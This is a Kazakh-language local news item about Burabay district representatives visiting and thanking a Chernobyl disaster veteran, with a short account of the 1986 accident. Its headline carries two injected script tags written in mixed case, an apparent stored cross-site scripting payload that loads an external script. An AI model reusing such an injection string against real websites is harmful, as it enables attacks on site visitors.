Чернобыль апатының ардагеріне құрмет көрсетті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.04.2024

Жыл сайын 26 сәуірде бүкіл әлемде қайғылы күн – Чернобыль апатының күні атап өтіледі. Соңғы жылдары 26 сәуір тек Чернобыль күні ғана емес, сонымен қатар радиациялық апаттардың құрбандарын еске алу күні ретінде атап өтіледі. 1986 жылдың 25-нен 26 сәуіріне қараған түні Украина астанасы Киевтен 130 км қашықтықта орналасқан Чернобыль қаласының маңында орналасқан атом электр станциясында әлемдегі ең ірі өнеркәсіптік апаттардың бірі болды.
Бүгін Бурабай ауданы ардагерлер кеңесінің төрағасы Сыздықова Жаналдық Зарлыковна, Лешин Виктор Васильевич, Бурабай ауданы Чернобыль мүгедектері қоғамдық бірлестігінің төрағасы, "Арман" балалар-жасөспірімдер шығармашылық орталығының бұқаралық бөлімінің меңгерушісі Байздрахманова Қарлығаш Атымтайқызы, көшбасшылар активі сол қайғылы оқиғалардың куәгері, ардагер Анатолий Васильевичке барды.
Анатолий Васильевич, сіз нағыз батырсыз, патриотсыз . Біз сізге батылдығыңыз үшін алғыс айтамыз!

 

Просмотров: 105


Пікір қосу



Деректерді қолтаңбаға қосу